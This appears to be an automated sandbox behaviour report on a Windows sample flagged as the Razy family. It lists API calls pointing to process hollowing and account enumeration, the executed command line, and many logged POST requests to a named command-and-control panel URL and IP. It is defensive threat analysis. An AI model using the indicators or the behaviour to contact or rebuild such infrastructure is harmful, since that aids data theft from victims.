kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW clr.dll.SetRuntimeInfo clr.dll._CorExeMain mscoree.dll.CreateConfigStream mscoreei.dll.CreateConfigStream kernel32.dll.GetNumaHighestNodeNumber kernel32.dll.GetSystemWindowsDirectoryW advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddSIDToBoundaryDescriptor kernel32.dll.CreateBoundaryDescriptorW kernel32.dll.CreatePrivateNamespaceW kernel32.dll.OpenPrivateNamespaceW kernel32.dll.DeleteBoundaryDescriptor kernel32.dll.WerRegisterRuntimeExceptionModule kernel32.dll.RaiseException mscoree.dll.#24 mscoreei.dll.#24 ntdll.dll.NtSetSystemInformation kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.GetNativeSystemInfo ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware ole32.dll.CoGetContextToken clrjit.dll.sxsJitStartup clrjit.dll.getJit kernel32.dll.GetACP kernel32.dll.LocaleNameToLCID kernel32.dll.LCIDToLocaleName kernel32.dll.GetUserPreferredUILanguages kernel32.dll.UnmapViewOfFile kernel32.dll.CloseHandle nlssorting.dll.SortGetHandle nlssorting.dll.SortCloseHandle cryptsp.dll.CryptAcquireContextA cryptsp.dll.CryptCreateHash cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptHashData cryptsp.dll.CryptDestroyHash cryptsp.dll.CryptReleaseContext cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptImportKey cryptsp.dll.CryptExportKey cryptsp.dll.CryptDestroyKey mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap kernel32.dll.CompareStringOrdinal kernel32.dll.GetFullPathNameW kernel32.dll.SetThreadErrorMode kernel32.dll.GetFileAttributesExW kernel32.dll.ResolveLocaleName gdiplus.dll.GdiplusStartup kernel32.dll.IsProcessorFeaturePresent user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayMonitors user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC gdiplus.dll.GdipLoadImageFromStream windowscodecs.dll.DllGetClassObject kernel32.dll.WerRegisterMemoryBlock gdiplus.dll.GdipImageForceValidation gdiplus.dll.GdipGetImageType gdiplus.dll.GdipGetImageRawFormat kernel32.dll.GetEnvironmentVariableW kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges ntdll.dll.NtQuerySystemInformation kernel32.dll.CreateDirectoryW kernel32.dll.CopyFileW kernel32.dll.SetFileAttributesW advapi32.dll.RegSetValueExW gdiplus.dll.GdipGetImageWidth gdiplus.dll.GdipGetImageHeight gdiplus.dll.GdipCreateBitmapFromScan0 gdiplus.dll.GdipGetImagePixelFormat gdiplus.dll.GdipGetImageGraphicsContext user32.dll.GetProcessWindowStation user32.dll.GetUserObjectInformationA kernel32.dll.SetConsoleCtrlHandler kernel32.dll.GetModuleHandleW user32.dll.GetClassInfoW user32.dll.RegisterClassW ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree user32.dll.CreateWindowExW user32.dll.DefWindowProcW user32.dll.GetSysColor gdiplus.dll.GdipGraphicsClear gdiplus.dll.GdipDrawImageRectI gdiplus.dll.GdipDeleteGraphics gdiplus.dll.GdipBitmapGetPixel gdiplus.dll.GdipDisposeImage kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW ole32.dll.CoCreateGuid kernel32.dll.GetProcAddress kernel32.dll.WideCharToMultiByte kernel32.dll.LoadLibraryA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity kernel32.dll.CreateProcessA kernel32.dll.GetThreadContext kernel32.dll.SetThreadContext kernel32.dll.ReadProcessMemory kernel32.dll.WriteProcessMemory ntdll.dll.NtUnmapViewOfSection kernel32.dll.VirtualAllocEx kernel32.dll.ResumeThread psapi.dll.EnumProcesses kernel32.dll.TerminateProcess ole32.dll.CoWaitForMultipleHandles advapi32.dll.EventUnregister user32.dll.IsWindow user32.dll.SetWindowLongW user32.dll.SetClassLongW user32.dll.DestroyWindow user32.dll.PostMessageW sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW cryptsp.dll.CryptGenRandom ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx kernel32.dll.QueryActCtxW vssapi.dll.CreateWriter oleaut32.dll.#6 oleaut32.dll.#2 advapi32.dll.LookupAccountNameW samcli.dll.NetLocalGroupGetMembers samlib.dll.SamConnect rpcrt4.dll.NdrClientCall3 rpcrt4.dll.RpcStringBindingComposeW rpcrt4.dll.RpcBindingFromStringBindingW rpcrt4.dll.RpcStringFreeW rpcrt4.dll.RpcBindingFree samlib.dll.SamOpenDomain samlib.dll.SamLookupNamesInDomain samlib.dll.SamOpenAlias samlib.dll.SamFreeMemory samlib.dll.SamCloseHandle samlib.dll.SamGetMembersInAlias netutils.dll.NetApiBufferFree samlib.dll.SamEnumerateDomainsInSamServer samlib.dll.SamLookupDomainInSamServer ole32.dll.StringFromCLSID oleaut32.dll.#4 oleaut32.dll.#7 propsys.dll.VariantToPropVariant wbemcore.dll.Reinitialize wbemsvc.dll.DllGetClassObject wbemsvc.dll.DllCanUnloadNow authz.dll.AuthzInitializeContextFromToken authz.dll.AuthzInitializeObjectAccessAuditEvent2 authz.dll.AuthzAccessCheck authz.dll.AuthzFreeAuditEvent authz.dll.AuthzFreeContext authz.dll.AuthzInitializeResourceManager authz.dll.AuthzFreeResourceManager rpcrt4.dll.RpcBindingCreateW rpcrt4.dll.RpcBindingBind rpcrt4.dll.I_RpcMapWin32Status advapi32.dll.EventWrite kernel32.dll.RegCloseKey kernel32.dll.RegSetValueExW kernel32.dll.RegOpenKeyExW kernel32.dll.RegQueryValueExW wmisvc.dll.IsImproperShutdownDetected wevtapi.dll.EvtRender wevtapi.dll.EvtNext wevtapi.dll.EvtClose wevtapi.dll.EvtQuery wevtapi.dll.EvtCreateRenderContext rpcrt4.dll.RpcBindingSetAuthInfoExW rpcrt4.dll.RpcBindingSetOption ole32.dll.CoCreateFreeThreadedMarshaler ole32.dll.CreateStreamOnHGlobal advapi32.dll.RegCreateKeyExW kernelbase.dll.InitializeAcl kernelbase.dll.AddAce sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW kernel32.dll.IsThreadAFiber kernel32.dll.OpenProcessToken kernelbase.dll.GetTokenInformation kernelbase.dll.DuplicateTokenEx kernelbase.dll.AdjustTokenPrivileges kernelbase.dll.AllocateAndInitializeSid kernelbase.dll.CheckTokenMembership kernel32.dll.SetThreadToken oleaut32.dll.#285 advapi32.dll.RegOpenKeyW oleaut32.dll.#12 oleaut32.dll.#286 ole32.dll.CLSIDFromString oleaut32.dll.#17 oleaut32.dll.#20 oleaut32.dll.#19 oleaut32.dll.#25 ole32.dll.CoRevertToSelf advapi32.dll.LogonUserExExW sspicli.dll.LogonUserExExW authz.dll.AuthzInitializeContextFromSid ole32.dll.CoGetCallContext ole32.dll.CoImpersonateClient advapi32.dll.OpenThreadToken oleaut32.dll.#8 oleaut32.dll.#9 ole32.dll.CoSwitchCallContext oleaut32.dll.#287 oleaut32.dll.#288 oleaut32.dll.#289 oleaut32.dll.#283 oleaut32.dll.#284 oleaut32.dll.#500 ole32.dll.CoUninitialize ntmarta.dll.GetMartaExtensionInterface kernel32.dll.GetThreadPreferredUILanguages kernel32.dll.SetThreadPreferredUILanguages kernel32.dll.GetSystemDefaultLocaleName fastprox.dll.DllGetClassObject fastprox.dll.DllCanUnloadNow oleaut32.dll.#290 wmi.dll.WmiQueryAllDataW wmi.dll.WmiQuerySingleInstanceW wmi.dll.WmiSetSingleItemW wmi.dll.WmiSetSingleInstanceW wmi.dll.WmiExecuteMethodW wmi.dll.WmiNotificationRegistrationW wmi.dll.WmiMofEnumerateResourcesW wmi.dll.WmiFileHandleToInstanceNameW wmi.dll.WmiDevInstToInstanceNameW wmi.dll.WmiQueryGuidInformation wmi.dll.WmiOpenBlock wmi.dll.WmiCloseBlock wmi.dll.WmiFreeBuffer wmi.dll.WmiEnumerateGuids winbrand.dll.BrandingLoadString security.dll.InitSecurityInterfaceW cryptsp.dll.SystemFunction035 schannel.dll.SpUserModeInitialize user32.dll.GetSystemMetrics ntdll.dll.RtlInitUnicodeString ntdll.dll.RtlFreeUnicodeString ntdll.dll.NtSetSystemEnvironmentValue ntdll.dll.NtQuerySystemEnvironmentValue ntdll.dll.NtCreateFile ntdll.dll.NtQueryDirectoryObject ntdll.dll.NtQueryObject ntdll.dll.NtOpenDirectoryObject ntdll.dll.NtQueryInformationProcess ntdll.dll.NtQueryInformationToken ntdll.dll.NtOpenFile ntdll.dll.NtClose ntdll.dll.NtFsControlFile ntdll.dll.NtQueryVolumeInformationFile netapi32.dll.NetGroupEnum netapi32.dll.NetGroupGetInfo netapi32.dll.NetGroupSetInfo netapi32.dll.NetLocalGroupGetInfo netapi32.dll.NetLocalGroupSetInfo netapi32.dll.NetGroupGetUsers netapi32.dll.NetLocalGroupGetMembers netapi32.dll.NetLocalGroupEnum netapi32.dll.NetShareEnum netapi32.dll.NetShareGetInfo netapi32.dll.NetShareAdd netapi32.dll.NetShareEnumSticky netapi32.dll.NetShareSetInfo netapi32.dll.NetShareDel netapi32.dll.NetShareDelSticky netapi32.dll.NetShareCheck netapi32.dll.NetUserEnum netapi32.dll.NetUserGetInfo netapi32.dll.NetUserSetInfo netapi32.dll.NetApiBufferFree netapi32.dll.NetQueryDisplayInformation netapi32.dll.NetServerSetInfo netapi32.dll.NetServerGetInfo netapi32.dll.NetGetDCName netapi32.dll.NetWkstaGetInfo netapi32.dll.NetGetAnyDCName netapi32.dll.NetServerEnum netapi32.dll.NetUserModalsGet netapi32.dll.NetScheduleJobAdd netapi32.dll.NetScheduleJobDel netapi32.dll.NetScheduleJobEnum netapi32.dll.NetScheduleJobGetInfo netapi32.dll.NetUseGetInfo netapi32.dll.NetEnumerateTrustedDomains netapi32.dll.DsGetDcNameW netapi32.dll.DsRoleGetPrimaryDomainInformation netapi32.dll.DsRoleFreeMemory netapi32.dll.NetRenameMachineInDomain netapi32.dll.NetJoinDomain netapi32.dll.NetUnjoinDomain wkscli.dll.NetWkstaGetInfo cscapi.dll.CscNetApiGetInterface kernel32.dll.GetDiskFreeSpaceExW kernel32.dll.GetVolumePathNameW kernel32.dll.CreateToolhelp32Snapshot kernel32.dll.Thread32First kernel32.dll.Thread32Next kernel32.dll.Process32First kernel32.dll.Process32Next kernel32.dll.Module32First kernel32.dll.Module32Next kernel32.dll.Heap32ListFirst kernel32.dll.GlobalMemoryStatusEx kernel32.dll.GetSystemDefaultUILanguage oleaut32.dll.#15 oleaut32.dll.#26 kernel32.dll.GetCurrentThread kernel32.dll.DuplicateHandle kernel32.dll.GetCurrentThreadId user32.dll.RegisterWindowMessageW kernel32.dll.LoadLibraryW gdi32.dll.GetStockObject user32.dll.GetWindowLongW user32.dll.CallWindowProcW user32.dll.GetClientRect user32.dll.GetWindowRect user32.dll.GetParent ole32.dll.OleInitialize ole32.dll.CoRegisterMessageFilter user32.dll.PeekMessageW user32.dll.WaitMessage
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\poloport.exe" C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Started Services
Nothing to display
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-02-08 22:29:19 | 2018-02-08 22:32:13 | 174 |
34 HTTP Request(s) detected
http://checkip.dyndns.org/
- Hostname: checkip.dyndns.org
- IP Address: 216.146.43.71
- Port: 80
- Count: 1
GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 11
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 242 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 314
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 294 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 292 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 601
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 242 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 171
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 296 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 1020 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41432 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 264 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 21
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41478 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41478 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 9
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41480 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 4
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41482 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 3
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 42530 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 2
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 42528 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 42532 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41774 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 2
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41778 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41776 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41484 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 32
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41460 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 36
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 298 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41460 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 294 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 3
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41428 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 12
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41462 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 55516 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 42048 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41430 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 4
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 300 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41464 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 2
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41740 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 296 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 298 Expect: 100-continue Connection: Keep-Alive
Detected family: #Razy
TheSystem Itself @ 2018-02-08 22:56:07
#infosec #automation
TheSystem Itself @ 2018-02-08 22:30:25